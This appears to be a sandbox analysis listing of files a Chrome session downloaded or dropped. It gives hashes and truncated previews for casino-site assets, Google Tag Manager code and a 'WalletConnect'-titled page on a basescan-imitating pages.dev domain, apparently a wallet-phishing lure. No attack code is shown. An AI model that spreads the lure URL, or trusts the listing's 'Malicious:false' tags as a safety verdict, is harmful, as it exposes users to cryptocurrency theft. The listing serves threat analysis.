                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (24744)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):282641
                                                                                                                                                                                                                                              Entropy (8bit):5.5670539358525275
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:hsSyEgd2ax8eul/Yeip6i/00dlXol0FQbQwM87uYL0pSN0LlspNsEemtJeNPn8:OEgUp9FuRlq0kd7ihJsLsEemveh8
                                                                                                                                                                                                                                              MD5:FF60DFAD22C136B172F939FA4C97345C
                                                                                                                                                                                                                                              SHA1:C88D5AE6359987E1A564A5C975BD4A626597757A
                                                                                                                                                                                                                                              SHA-256:61F654D5061847C97586762D87E640458F5751F87BB0255F78EF6442FC9041B7
                                                                                                                                                                                                                                              SHA-512:A65838A90B6B1397AB94A02896C521344025314A550590BB5E74C13629E8259B500E2CF7D02313BFC7231CE329C250B493F9A2FA5AFCD8242A2F6A91F7B4D162
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtm.js?id=GTM-TR7QDQDP
                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"28",. . "macros":[{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":"0","vtp_name":"userId"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":"0","vtp_name":"sales"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":"0","vtp_name":"orderId"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":"USD","vtp_name":"currency"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"functi
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1080)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1081
                                                                                                                                                                                                                                              Entropy (8bit):5.190134993701119
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:IN5YFHKjVmMwObBPjSfbG2BHCbM6qu61QiugD:rFHKjVmMw2JSD7Ocd1QrgD
                                                                                                                                                                                                                                              MD5:3333EC0A617A99B30A6B19FE3650EFBF
                                                                                                                                                                                                                                              SHA1:60D67C31A57BC93808D096AE98178D418150D218
                                                                                                                                                                                                                                              SHA-256:7389E885D838A350B54D4E28BAD3E7D80BBE8E718496D82BF6E6985526D4BE59
                                                                                                                                                                                                                                              SHA-512:9D0BD95F17A84B74CE42CC9AABF6FF43D22480ABCE22D173DFED74D59C62A8EFD603C99D803A640A3590B8B608AD3877F7EDD5B1BF13BBBAB4EA85D2D343B2F5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{r as S,i as y}from"./isObject-909534d5.js";import{t as b}from"./toNumber-e58af95e.js";var R=function(){return S.Date.now()};const h=R;var A="Expected a function",F=Math.max,N=Math.min;function j(x,i,a){var u,o,m,f,e,r,d=0,E=!1,c=!1,g=!0;if(typeof x!="function")throw new TypeError(A);i=b(i)||0,y(a)&&(E=!!a.leading,c="maxWait"in a,m=c?F(b(a.maxWait)||0,i):m,g="trailing"in a?!!a.trailing:g);function v(n){var t=u,l=o;return u=o=void 0,d=n,f=x.apply(l,t),f}function p(n){return d=n,e=setTimeout(s,i),E?v(n):f}function C(n){var t=n-r,l=n-d,W=i-t;return c?N(W,m-l):W}function k(n){var t=n-r,l=n-d;return r===void 0||t>=i||t<0||c&&l>=m}function s(){var n=h();if(k(n))return I(n);e=setTimeout(s,C(n))}function I(n){return e=void 0,g&&u?v(n):(u=o=void 0,f)}function L(){e!==void 0&&clearTimeout(e),d=0,u=r=o=e=void 0}function M(){return e===void 0?f:I(h())}function T(){var n=h(),t=k(n);if(u=arguments,o=this,r=n,t){if(e===void 0)return p(r);if(c)return clearTimeout(e),e=setTimeout(s,i),v(r)}return
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1361
                                                                                                                                                                                                                                              Entropy (8bit):6.020078180473798
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6Likzum8COZNDsLlpGPUc6Ql1tcqheI0zYjLXPsKQrL5:+ZYjwiklfll0xl1fheI0zSfPQh
                                                                                                                                                                                                                                              MD5:707A374913970DC2903DC0E82053F80F
                                                                                                                                                                                                                                              SHA1:E86345526B214C470EB66DA07F19429B2CCEBEFD
                                                                                                                                                                                                                                              SHA-256:9DC75E63D1C4425FF163D2E42646EBD32313FE8A8659BABE34D058506A319E34
                                                                                                                                                                                                                                              SHA-512:980EA58BF462CD821890CF224404BB89C17AB2F88F3CCC83C582642139A3AEF7BA9F73C8E01D00F7FF5335A38913DC172FD8A0692B234D6CF0981F435E4FBFB9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/90ba079bba.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3.......(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma...................&mdat........0@CA.2.......1..O.P..xj...8]p...sv....IEt.M3.d..?a..&..k...?....Lz.0"qG..=...e n.S/.Z.!...N.p$R........Dw.WO..Kp...G.Y6..t.5.m.._.._.':.r.FOu.....Pw.#...I~r}m3b8QmE
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (956)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):957
                                                                                                                                                                                                                                              Entropy (8bit):4.94879489690738
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:wGwfH3Q4SZLTTy8TsA0QmfJELnEMdAJ4PMmubKVaOTzDxzROXJafWBB6JvtJhDkG:wjQfZLy8NnaJSEZPqB9Oykkvh4CL8K
                                                                                                                                                                                                                                              MD5:D8CC3D9DBD1F66B8B3CBAA552DFF20C8
                                                                                                                                                                                                                                              SHA1:7BDC4845C0109485269B9AAEB73D67BC1F9B36BD
                                                                                                                                                                                                                                              SHA-256:1CBEEBA8D783BFF74C89301C4B62EA897324DE98CE7800F3504F6D54BA4247EE
                                                                                                                                                                                                                                              SHA-512:254F087A4BC49FB85EC3D4FA9A23C4FF4E2D220921099AAA8EC3526FBF8BA9B5698B6C4089D31C4DD5F2121F410B7B5C6C201B9B7317A8116B3FA1B338CC9EA9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/solid-js-38561dfe.js
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{$DEVCOMP:a,$PROXY:r,$TRACK:s,DEV:t,ErrorBoundary:n,For:o,Index:c,Match:l,Show:i,Suspense:u,SuspenseList:d,Switch:b,batch:p,cancelCallback:h,catchError:C,children:E,createComponent:S,createComputed:f,createContext:g,createDeferred:x,createEffect:m,createMemo:R,createReaction:w,createRenderEffect:y,createResource:M,createRoot:k,createSelector:q,createSignal:O,createUniqueId:P,enableExternalSource:T,enableHydration:A,enableScheduling:D,equalFn:F,from:I,getListener:$,getOwner:v,indexArray:z,lazy:B,mapArray:L,mergeProps:V,observable:_,on:j,onCleanup:H,onError:K,onMount:U,requestCallback:W,resetErrorBoundaries:X,runWithOwner:Y,sharedConfig:G,splitProps:J,startTransition:N,untrack:Q,useContext:Z,useTransition:ee}=e.dxzurp;export{n as E,o as F,c as I,l as M,i as S,H as a,O as b,R as c,m as d,u as e,d as f,E as g,b as h,J as i,M as j,k,ee as l,V as m,g as n,U as o,Z as p,P as q,f as r,N as s,q as t,Q as u,I as v,v as w,Y as x};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1423
                                                                                                                                                                                                                                              Entropy (8bit):6.097191296392995
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6LNikzum8COZNDsLlpGPUc6QlPdGfaFwQbb3UpWz/W9085DW+k7:+ZYjwNiklfll0xlP0xQHkwEJc+k7
                                                                                                                                                                                                                                              MD5:8054B2DA6138257A6A7C147B2330CE08
                                                                                                                                                                                                                                              SHA1:F2D7744C1677D6890481A7C13BF7408B6CAF00B7
                                                                                                                                                                                                                                              SHA-256:E94D461446FDFEDC48BD6E282A77558BB0D7BFA7CE8BEA6C4B19F56FE07F2D56
                                                                                                                                                                                                                                              SHA-512:39126DDDDFC77BB8A0AE42809A34BC3EA94A12BBED37E16B070FBA62D3F211196929FA52C0300E5081407A5969EE708F1D6A8DC7C3A74D22C761F409BD6C1DAD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/1b0425c6-d2cc-40af-8820-67eee4bc9b3b.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3...\...(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma...................dmdat........0@CA.2.......1..W..^.).i.7...2...0.../E..b....T...:,1e.L.n....)....?61....1s]!...0..?./.NtS..'ei4m....w...D....fH.vy.H.Vo..ZX..".f.v..k.....\.@)3G.u...jUX...`?>....jc
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3210
                                                                                                                                                                                                                                              Entropy (8bit):7.739462025595509
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:rGcIEcsyJzY0C1maDqeFrC3+d0aZMFOJo2:rGpIyqSeQ3H4WOr
                                                                                                                                                                                                                                              MD5:524D4E74835A6E0928D10CBFEDB4A16D
                                                                                                                                                                                                                                              SHA1:217E654AC4F7F05B13D129B7BB6F6D9A028665C3
                                                                                                                                                                                                                                              SHA-256:F141237271130428828DE0A119D69D20F43A3F2A630E3943DAC98EEC9BD4BA91
                                                                                                                                                                                                                                              SHA-512:1F97D7CFADA99DAD3984967E9B35DFA0586F81CB3CE75119605A3C3E5FF71CC538CAD4C0E5521502C6F327B2AE11D4E0F62DA454F12F1E94DB4EC81D9770F0B2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@.........................................8iinf..........infe........av01.....infe........av01.....iprp....ipco....colrnclx...........av1C........ispe.......@...2....pixi.........8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....av1C........pixi............ipma..........................iref........auxl..........mdat.....!g...2........VF`.X.....!g..@CA.2......9....._...$f8.?P.B_V.K.l.......+........yp..XX{..p..g....t9.`...R3.......S..W......0....@...j.o.#J.;ja.<.*...L...>.c.\W....W..4...........ws.O....$OP....:v....bX"P.J..8..F.E...2....?1...}v....W.^.iw.w...B..|d.E."...x./......V.b.w.d:.`Vm.J$..J.$@...v_.?v1.......g.&..>.e.74..'Yg.,1...tY ]..G..0.....=|F....;....\...)...>C.&S......Vk...e.... H.."~..]mo.M...:I....W.......<.).}q.......=.R.~p...v...O.t3(.l..d.t6......?.LTg.[*..PS.uG7pp...#.)....~5..1F..I....sT)1d#..2pB.v.M.U.u9.a..Y......x.Q....f2....5...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):136296
                                                                                                                                                                                                                                              Entropy (8bit):7.99557426259845
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:3072:BR8CoElj3T6pNcLMFGyRFVBuOf2F0hE/Q3t9SE8Sutbkydf7X2B5fW1TU7:BRPlf4ZRXIwHE0rn8SuZHJzA5l7
                                                                                                                                                                                                                                              MD5:ECA0CDE837944B7BFF7EA2E524D1C26E
                                                                                                                                                                                                                                              SHA1:D2FF2C7B7505AE2D40806901F90BBE13598DCF9E
                                                                                                                                                                                                                                              SHA-256:269232B70F7647D14A9717D9922BB85CF26CFA6B56094E63870D5650980137C8
                                                                                                                                                                                                                                              SHA-512:D44926506E52379F585DEBA9BBBC719677352F66FE01C2C870E1A30B4B57B76364E54278ADB84243E8F3DF43069262F2B682E44E54AFF13D33AEAD3D1857875C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/updown-DQe7IPIb.png
                                                                                                                                                                                                                                              Preview:RIFF`...WEBPVP8LS.../?...........N.=3d....{..{B...5...H..af.h6..mL...Ue..C.m7.$...8.%..{.{.!3C.[...v..m...R.C..p...S.J}l..?H..)..+...'&G...0P.....0......:...h*. .4.G2..P.@.tJGFw.Q....h@ .e.t.......n.o..?........nY...H...q..cE..L....s.y.RjS.C.....F...<H....o .>.~hX .l..I..|...2..]......L-...-...-.....d.t...7...EtRt?..i.Sg).?.......w.NFw..p"....I@C..Y..`.. ......0g.I7..#....FW}....?{..n..n.9~.k.w9....z..0r}P...2...,).eD...*5...J6.c|."..@..|MQd.b..P.r...3.0...b...4.\.d_.......L.....K.~\~...W.F.4...(.E.&bB.y.+.8Q.<.....n.sdv.............63.x}P.JU:,!.1{...........9q|L.Zq.....st.....~j|.....;.e1..e]....'.O......../..&d7....=[..[......5.n.s{.6.........I.M..h)[TP.... .E..M;..Q..Y......i.$.........5.......7..zzu....#..$I.,.....2.{..E..._,.|.....k<5<|\_.:....,/..2....:-,.../dX.........x.t].}n.g.../..jJ......^.D..e/*0[tUsG..n....".7 ..P..8 .fV....u.d..mVn/h.R\.Ry....W...y...Q!...+..U.....@4.s..`5V^..a.f..K....`...h..-.....s.RfT.+.!.....5.M`f..>
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12701)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):12702
                                                                                                                                                                                                                                              Entropy (8bit):5.230867963428291
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:4nHMfyU8giEdgHAyQf0Bh5P+xVWCyWrB3KDc:aMaURi0gHAvsBrP4VWe3KA
                                                                                                                                                                                                                                              MD5:66F0EE22A9BA8FD5277DCCF40687D2AC
                                                                                                                                                                                                                                              SHA1:627083F14A407233E9FDAE56C552D5784BF45E50
                                                                                                                                                                                                                                              SHA-256:14315F22BEE3800E37B38A4477BE0A8CD200F4738E5C9FF1C489BAE67E6F9F0D
                                                                                                                                                                                                                                              SHA-512:936AF299A299C85D2609F907335E20824D09361CE3DB36866706EA07819766EB25FD12A485A305D1F512B698EF7B85CF4F924820083892F755CDC5B709FCA2DE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/Casino.page-BK1IC-Vp.js
                                                                                                                                                                                                                                              Preview:import{i as l,c as e,t as u,Q as f,al as D,C as I,l as y,s as N,am as O,m as P,e as x,f as g,a as k,h as _,af as q,ae as L,an as Q,a9 as U,ao as Y,ap as z,G as j,a7 as J,ah as K,a1 as X,g as Z,aq as ee,ar as te,b as G,v as re,as as E,ag as F,ai as v,at as ae,au as ne,av as le,aw as se,aj as B,W as ie,a6 as C,B as ce,ax as ue,ay as oe,r as R,az as ge,$ as de,aA as he,a3 as me,x as T,w as A}from"./index-DD2Zk4iT.js";import{B as ve,R as fe}from"./index-C-NOM3iv.js";import{S as H}from"./index-CMxvzQWG.js";import w from"./GameEntryWrap-B0vD2mef.js";import{ProviderView as be}from"./Providers.page-v7ZHXAmf.js";import{TagSimple as S}from"./Tag.page-zKV2ptps.js";import{ThemesView as we}from"./Themes.page-BSU31Xnu.js";var _e=g("<div>"),pe=g('<span class="mr-1 text-secondary">'),$e=g("<span>"),xe=g('<img class="h-10 w-auto"alt=provider>');const ye=function(r){return(()=>{var t=_e();return l(t,e(O,{class:"flex-1 bg-layer3",get value(){return r.selectProvider},get options(){return r.providers},get
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1568)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1569
                                                                                                                                                                                                                                              Entropy (8bit):5.397424329508399
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:JxVqG3TNI64Y7ZOLZF+XaH1/b0j30jqxk0jC9H5FkfZgoRgtRr69lGJBdmN3EJ:JvrNI6R7ZnFjEjIjgo+tR2rGJ83EJ
                                                                                                                                                                                                                                              MD5:57CE9F5699885104E40632039E8CD50B
                                                                                                                                                                                                                                              SHA1:DCCB76B5E1414E3AA2E808A1151A2C2DABC48C9D
                                                                                                                                                                                                                                              SHA-256:011B0379C271F29FF0EEFC3FB7AAA82A0E15EE878548DB11E7647D63098DE5C3
                                                                                                                                                                                                                                              SHA-512:C9F4EB02D6121370EA2790B1330361CB8D9A1FBAF296E7CEB9E64EAD7A29AB2364E6303B42197B35ADF51BEE6301FEA7B9EC95FCDF93B8210E678DE6B3FA807E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/utils-189ac561.js
